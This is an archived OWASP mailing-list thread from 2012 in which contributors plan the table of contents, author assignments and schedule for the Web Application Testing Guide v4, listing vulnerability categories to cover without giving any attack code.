[Owasp-testing] Testing Guide V4 - Start up

Matteo Meucci matteo.meucci at owasp.org
Wed Sep 5 10:29:36 UTC 2012


Hi,
thanks Ismael.
I'll update the ToC on the wiki (there are some items repeated 2 times
and some to understand better if include).

As Kevin said mobile testing is part of another OWASP project.

Regarding many contributors contacting me directly or asking to
contribute, first of all thanks, then please specify which
area/paragraph would you like to cover.

Paragraph template: yes we have a template from v3, may we can review
also that. From the 2nd phase (writing the new guide) I'll create a new
paragraph with this template for each item to write.

Tools: as Daniel said yes we have to be agnostic regarding the tools.
But at the end of each paragraph as usual we can specify a list of Open
Source tools that help to perform that test.

Remember that we are creating a guide for Web Application Penetration
Testing. All the test will be called "Testing for [test]".

So cryptographic tests are good to add but only that regarding the
running application testing, for example Padding Oracle.
But "weak random generators" and "weak algorithms to protect data" in
general is not possible to test when performing a WebAppPentest.

WebAppSecTesting Cheat Sheet:
https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet

In the testing Guide we have already a similar paragraph (v3):
https://www.owasp.org/index.php/Testing_Checklist

I think we can use it to verify if some items are missing, than the
cheat sheet will be updated to the new Testing Checklist paragraph (as
mentioned in the Cheat sheet purpose).

Thanks!
Mat



On 09/05/2012 03:33 AM, Ismael Rocha wrote:
> Hello All!
> 
> I've compiled the Web App Penetration Test part from the ToC with all
> (sorry if I missed some!) suggestions presented in the list.
> 
> Follow the results.
> 
> We also have to decide whether mobile will be part of the scope or not.
> 
> 
> 
> -----------------------------------------
> 
> Testing Guide V4 ToC
> 
> ...
> 
> 4 Web Application Penetration Test
> 
> 4.1 Introduction and Objectives [To review--> Mat]
> 
> 4.1.1 Testing Checklist [To review at the end of brainstorming --> Mat]
> 
> 4.2 Information Gathering [To review--> contributor here]
>    
> 
> 4.3 Configuration and Deploy Management Testing
> 
> Infrastructure Configuration management weakness
> Application Configuration management weakness
> File extensions handling
> Old, backup and unreferenced files
> Access to Admin interfaces
> Bad HTTP Methods enabled, [new]
> Informative Error Messages
> Database credentials/connection strings available
> Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
> Test for policies (e.g. Flash, Silverlight, robots) [suggestion CheatSheet]
> Check for sensitive data in client-side code (e.g. API keys, credentials)
> Test for policies (e.g. Flash, Silverlight, robots)
> Test for sensitive information in logs
> 
> 
> 4.4 Authentication Testing
> 
> Credentials transport over an unencrypted channel [Robert Winkel]
> User enumeration (also Guessable user account) [Robert Winkel]
> Default passwords [Robert Winkel]
> Weak lock out mechanism [New! - Robert Winkel]
> Account lockout DoS [New! - Robert Winkel]
> Bypassing authentication schema
> Directory traversal/file include
> Vulnerable remember password [Robert Winkel]
> Browser cache weakness [New!]
> Weak password policy [New! - Robert Winkel]
> Weak username policy [New! - Robert Winkel]
> Weak security question/answer [New! - Robert Winkel]
> Failure to restrict access to authenticated resource [New!]
> Weak password change function [New! - Robert Winkel]
> Testing for CAPTCHA
> Test multi factor authentication
> Test for consistent authentication across applications with shared
> authentication schema / SSO [suggetion CheatSheet/SAML Ismael Gonçalves]
> Test for autocomplete on password forms/input
> Test for logout functionality presence
> Test for cache management on HTTP (eg Pragma, Expires, Max-age)
> Test for user-accessible authentication history
> Test for out-of channel notification of account lockouts and successful
> password changes
> 
> 4.5 Session Management Testing
> 
> Bypassing Session Management Schema
> Weak Session Token
> Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity
> Exposed sensitive session variables
> CSRF
> Session passed over http [New!]
> Session token within URL [New!]
> Session Fixation
> Session token not removed on server after logout [New!]
> Persistent session token [New!]
> Session token not restrcited properly (such as domain or path not set
> properly) [New!]
> Logout function not properly implemented
> Test for consistent session management across applications with shared
> session management
> Confirm that new session tokens are issued on login, role change and logout
> 
> 4.6 Authorization Testing
> 
> Bypassing authorization schema
> Privilege Escalation
> Insecure Direct Object References
> Failure to Restrict access to authorized resource [New!]
> 
> 4.7 Business Logic Testing (OWASP-BL-001) [To review--> contributor
> here] Business Logic
> 
> 4.8 Data Validation Testing
> 
> Reflected XSS
> Stored XSS
> HTTP Verb Tampering [Brad Causey]
> HTTP Parameter pollution [Brad Causey]
> Unvalidated Redirects and Forwards [Brad Causey]
> SQL Injection [Brad Causey]
> LDAP Injection
> ORM Injection
> XML Injection
> SSI Injection
> XPath Injection
> SOAP Injection
> IMAP/SMTP Injection
> Code Injection
> OS Commanding
> Buffer overflow
> Incubated vulnerability
> Test for XXE Injection
> Test for XQuery Injection
> HTTP Splitting/Smuggling
> Test for HTTP Verb Tampering
> Test for Open Redirection
> Test for Local File Inclusion
> Test for Remote File Inclusion
> Compare client-side and server-side validation rules
> Test for NoSQL injection
> Test for HTTP parameter pollution
> Test for auto-binding
> Test for HTML Injection
> Test for File upload
> Expression Language Injection
> 
> 4.9 Testing for Data Encryption (New!)
> 
> Application did not use encryption
> Weak SSL/TSL Ciphers, Insufficient
> Transport Layer Protection
> Cacheable HTTPS Response
> Cache directives insecure
> Insecure Cryptographic Storage [mainly CR Guide]
> Sensitive information sent via unencrypted channels
> 
> 
> 4.10 XML Interpreter? (New!)
> 
> Weak XML Structure XML content-level WS HTTP GET parameters/REST WS
> Naughty SOAP attachments WS Replay Testing
> 
> 4.11 Client Side Testing (New!)
> 
> DOM XSS
> Cross Site Flashing
> ClickHijacking
> JSON
> HTML 5
> 
> 4.12 Denial of Service
> 
> Test for account lockout
> Test for HTTP protocol DoS
> 
> 4.13 Evasive Techniques in General
> 
> ...
> 
> Regards.
> 
> Ismael Gonçalves
> 
> On Tue, Sep 4, 2012 at 6:39 PM, Ismael Rocha
> <ismaelrocha.projetos at gmail.com <mailto:ismaelrocha.projetos at gmail.com>>
> wrote:
> 
>     Hello.
> 
>     I think maybe we should make a cross-reference between the ToC and
>     the Testing Cheat Sheet. It would help us to identify which aspects
>     are covered and which aren´t covered in the ToC.
>     For example: SSO is covered in the cheatsheet and not covered in the
>     ToC. Also HTTP DoS.
>     It also can give us some ideas about the names of the sections. If
>     anybody did it already I can do it.
> 
>     Ismael Gonçalves
> 
>     https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet
> 
>     https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
> 
> 
>     On Tue, Sep 4, 2012 at 6:16 PM, Simone Onofri
>     <simone.onofri at gmail.com <mailto:simone.onofri at gmail.com>> wrote:
> 
>         On Tue, Sep 4, 2012 at 11:13 PM, Ismael Rocha
>         <ismaelrocha.projetos at gmail.com
>         <mailto:ismaelrocha.projetos at gmail.com>> wrote:
>         > Hello.
> 
>         hi ismael,
> 
>         > As I mentioned some days ago, I suggested improve SSL Test
>         maybe based no
>         > Qualys SSLabs issues and other.
>         >
>         > "SSL Test
>         >  -> Enhace (maybe based on Qualys SSLlabs  tests?)"
> 
> 
>         +1, i also use it!
> 
>         > Still talking about "cryptography not used when necessary" I
>         would say that
>         > is important to cover aspects of technologies which use
>         ViewState concept
>         > (e.g. JSF, .NET).
> 
>         of couse!
> 
> 
>         > Ismael Gonçalves
>         >
>         >
>         > On Tue, Sep 4, 2012 at 5:42 PM, Simone Onofri
>         <simone.onofri at gmail.com <mailto:simone.onofri at gmail.com>>
>         > wrote:
>         >>
>         >> hi all,
>         >>
>         >> i see the question is "data encryption" covers transmission
>         and storage
>         >> both.
>         >>
>         >> historically two issues are divided. to brainstorming some
>         stuff, also
>         >> using the web application security testing checklist [1]:
>         >>
>         >>  - not used when necessary (e.g. for credential
>         transportation or storage)
>         >>  - algorithms
>         >>    - weak/homebrew (e.g. on ssl or when developers uses weak
>         >> algorithms to protect data)
>         >>    - wrong context (e.g. symmetric encryption for password
>         storage)
>         >>    - improper usage (e.g. hashing without salting, kdf with less
>         >> iterations)
>         >>  - keys and secrets
>         >>    - weak/short/guessable (e.g. also on ssl)
>         >>  - entropy issues
>         >>    - weak random generators
>         >>    - ...
>         >>
>         >> ideas?
>         >>
>         >> s.
>         >>
>         >>
>         >> [1]
>         >>
>         https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet
>         >> On Tue, Sep 4, 2012 at 9:56 PM, Juan Galiana Lara
>         <jgaliana at owasp.org <mailto:jgaliana at owasp.org>>
>         >> wrote:
>         >> > +1!
>         >> >
>         >> > I think that is really important to cover.
>         >> >
>         >> > I've seen a new  "Testing for Data Encryption (New!)" under
>         the data
>         >> > validation section, but I would rather consider to have a
>         main section
>         >> > for
>         >> > "Cryptography" at the same level of authentication,
>         authorization, data
>         >> > validation and so on.
>         >> >
>         >> > Cryptography is one of the most important topics in
>         security and there
>         >> > have
>         >> > been quite significant crypto vulnerabilities applied to
>         webapps like
>         >> > the
>         >> > padding oracle attack technique that was applied to decrypt
>         HTTP cookies
>         >> > in
>         >> > several frameworks like ASP.NET <http://ASP.NET>, ROR and
>         JSF two years back. Or the one
>         >> > Eduardo mention, extension attacks due to improper or lack
>         of use of
>         >> > HMAC
>         >> > algorithms, that is quite common.
>         >> >
>         >> > Actually, there are already few sections under DV in the
>         new table of
>         >> > contents, that would fit in that section:
>         >> >
>         >> > Testing for Data Encryption (New!)
>         >> >
>         >> > Application did not use encryption
>         >> > Weak SSL/TSL Ciphers
>         >> >
>         >> > Insufficient Transport Layer Protection
>         >> >
>         >> > Insecure Cryptographic Storage [mainly CR Guide]
>         >> >
>         >> >
>         >> > Thoughts?
>         >> >
>         >> >
>         >> > --
>         >> > Juan Galiana
>         >> >
>         >> >
>         >> > On Tue, Sep 4, 2012 at 3:58 AM, Eduardo Castellanos
>         <guayin at gmail.com <mailto:guayin at gmail.com>>
>         >> > wrote:
>         >> >>
>         >> >> Hello,
>         >> >>
>         >> >> What about a section for cryptographic attacks? Bad use of
>         crypto
>         >> >> functions in general. (Hash Length Extension, etc.) or
>         would that be
>         >> >> outside
>         >> >> the scope of the guide?
>         >> >>
>         >> >> Related links:
>         >> >>
>         >> >> https://blog.whitehatsec.com/hash-length-extension-attacks/
>         >> >>
>         https://www.owasp.org/index.php/Category:Cryptographic_Vulnerability
>         >> >>
>         >> >>
>         >> >>
>         http://blogs.msdn.com/b/ace_team/archive/2008/11/13/vulnerabilities-due-to-improper-use-of-crypto-part-1.aspx
>         >> >>
>         >> >>
>         >> >> Eduardo Castellanos N.
>         >> >>
>         >> >>
>         >> >>
>         >> >> On Mon, Sep 3, 2012 at 8:01 PM, Robert Winkel
>         >> >> <robert.winkel at saltbushgroup.com
>         <mailto:robert.winkel at saltbushgroup.com>> wrote:
>         >> >>>
>         >> >>> I have taken the liberty of assigning myself against
>         several of the
>         >> >>> Authentication Testing test cases.  I am happy to hand
>         those over if
>         >> >>> someone
>         >> >>> is interested in be assigned to those instead.
>         >> >>>
>         >> >>> What happened to the Denial of Service test cases?
>         >> >>>
>         >> >>> Is there a template to adhere to when the writing stage
>         begins?
>         >> >>>
>         >> >>> _______________________________________
>         >> >>> Robert “Bull” Winkel
>         >> >>> Director Saltbush Assurance
>         >> >>> email: robert.winkel at saltbushgroup.com
>         <mailto:robert.winkel at saltbushgroup.com>
>         >> >>> http://www.linkedin.com/in/robertwinkel
>         >> >>>
>         >> >>>
>         >> >>> -----Original Message-----
>         >> >>> From: owasp-testing-bounces at lists.owasp.org
>         <mailto:owasp-testing-bounces at lists.owasp.org>
>         >> >>> [mailto:owasp-testing-bounces at lists.owasp.org
>         <mailto:owasp-testing-bounces at lists.owasp.org>] On Behalf Of Matteo
>         >> >>> Meucci
>         >> >>> Sent: Friday, 31 August 2012 1:40 AM
>         >> >>> To: owasp-testing at lists.owasp.org
>         <mailto:owasp-testing at lists.owasp.org>
>         >> >>> Subject: [Owasp-testing] Testing Guide V4 - Start up
>         >> >>>
>         >> >>> Hi all Testing Guide contributors.
>         >> >>>
>         >> >>> Testing Guide v4 has been approved as Projects Reboot 2012!
>         >> >>> https://www.owasp.org/index.php/Projects_Reboot_2012
>         >> >>>
>         >> >>> Here is the list of contributors I've collected:
>         >> >>>
>         >> >>> Pavol Luptak
>         >> >>> Marco Morana
>         >> >>> Giorgio Fedon
>         >> >>> Stefano Di Paola
>         >> >>> Gianrico Ingrosso
>         >> >>> Giuseppe Bonfà
>         >> >>> Roberto Suggi Liverani
>         >> >>> Robert Smith
>         >> >>> Andrew Muller
>         >> >>> Robert Winkel
>         >> >>> tripurari rai
>         >> >>> Thomas Ryan
>         >> >>> tim bertels
>         >> >>> Cecil Su
>         >> >>> Aung KhAnt
>         >> >>> Norbert Szetei
>         >> >>> michael.boman
>         >> >>> Wagner Elias
>         >> >>> Kevin Horvat
>         >> >>> Juan Galiana Lara
>         >> >>> Kenan Gursoy
>         >> >>> Jason Flood
>         >> >>> Javier Marcos de Prado
>         >> >>> Sumit Siddharth
>         >> >>> Mike Hryekewicz
>         >> >>> psiinon
>         >> >>> Ray Schippers
>         >> >>> Raul Siles
>         >> >>> Jayanta Karmakar
>         >> >>> Brad Causey
>         >> >>> Vicente Aguilera
>         >> >>> Ismael Gonçalves
>         >> >>>
>         >> >>> Reviewers team:
>         >> >>>
>         >> >>> Paolo Perego
>         >> >>> Daniel Cuthbert
>         >> >>> Matthew Churcher
>         >> >>> Lode Vanstechelman
>         >> >>> Sebastien Gioria
>         >> >>>
>         >> >>>
>         >> >>> Introduction and Project purpose for v4:
>         >> >>> ============================ ============= The OWASP
>         Testing Guide v3
>         >> >>> includes a "best practice" penetration testing framework
>         which users
>         >> >>> can
>         >> >>> implement in their own organizations and a "low level"
>         penetration
>         >> >>> testing
>         >> >>> guide that describes techniques for testing most common web
>         >> >>> application
>         >> >>> and
>         >> >>> web service security issues. Nowadays the Testing Guide
>         has become the
>         >> >>> standard to perform a Web Application Penetration Testing
>         and many
>         >> >>> Companies
>         >> >>> all around the world have adopted it.
>         >> >>> It is vital for the project mantaining an updated project
>         that
>         >> >>> represents
>         >> >>> the state of the art for WebAppSec.
>         >> >>>
>         >> >>> Project Roadmap
>         >> >>> =============
>         >> >>>
>         >> >>> - (1) 1st phase: Brainstorming and create a new table of
>         contents
>         >> >>>
>         >> >>> Objective: creating a new table of contents of the OTGv4
>         assigning a
>         >> >>> task
>         >> >>> for each contributor.
>         >> >>> I created a new OWASP Testing Guide v4 table of Contents
>         here:
>         >> >>>
>         >> >>>
>         https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
>         >> >>>
>         >> >>> - (2) 2nd phase:  Writing
>         >> >>> 20th September 2012: Start writing the articles 1st
>         November 2012: 1st
>         >> >>> Draft
>         >> >>> 30th November: end of writing phase
>         >> >>>
>         >> >>> - (3) 3rd phase: Reviewing
>         >> >>>
>         >> >>> - 1st December 2012: Starting the review phase,
>         >> >>> - 15th December 2012: Create the RC1,
>         >> >>> - 31st January 2013: Release the version 4.
>         >> >>>
>         >> >>> Timeline November 2012 1st Draft, January 2013 Final Release
>         >> >>>
>         >> >>> So, let's start discussion about phase (1)!
>         >> >>>
>         >> >>> Thanks!
>         >> >>> Mat
>         >> >>>
>         >> >>> --
>         >> >>> Matteo Meucci
>         >> >>> OWASP Testing Guide Lead
>         >> >>> OWASP-Italy President
>         >> >>>
>         >> >>>
>         >> >>> _______________________________________________
>         >> >>> Owasp-testing mailing list
>         >> >>> Owasp-testing at lists.owasp.org
>         <mailto:Owasp-testing at lists.owasp.org>
>         >> >>> https://lists.owasp.org/mailman/listinfo/owasp-testing
>         >> >>>
>         >> >>> _______________________________________________
>         >> >>> Owasp-testing mailing list
>         >> >>> Owasp-testing at lists.owasp.org
>         <mailto:Owasp-testing at lists.owasp.org>
>         >> >>> https://lists.owasp.org/mailman/listinfo/owasp-testing
>         >> >>
>         >> >>
>         >> >>
>         >> >> _______________________________________________
>         >> >> Owasp-testing mailing list
>         >> >> Owasp-testing at lists.owasp.org
>         <mailto:Owasp-testing at lists.owasp.org>
>         >> >> https://lists.owasp.org/mailman/listinfo/owasp-testing
>         >> >>
>         >> >
>         >> >
>         >> > _______________________________________________
>         >> > Owasp-testing mailing list
>         >> > Owasp-testing at lists.owasp.org
>         <mailto:Owasp-testing at lists.owasp.org>
>         >> > https://lists.owasp.org/mailman/listinfo/owasp-testing
>         >> >
>         >> _______________________________________________
>         >> Owasp-testing mailing list
>         >> Owasp-testing at lists.owasp.org
>         <mailto:Owasp-testing at lists.owasp.org>
>         >> https://lists.owasp.org/mailman/listinfo/owasp-testing
>         >
>         >
>         >
>         >
>         > --
>         > Ismael Gonçalves
> 
> 
> 
> 
>     -- 
>     Ismael Gonçalves
> 
> 
> 
> 
> -- 
> Ismael Gonçalves
> 
> 
> _______________________________________________
> Owasp-testing mailing list
> Owasp-testing at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-testing
> 

-- 
--
Matteo Meucci
OWASP Testing Guide Lead
OWASP Italy President


More information about the Owasp-testing mailing list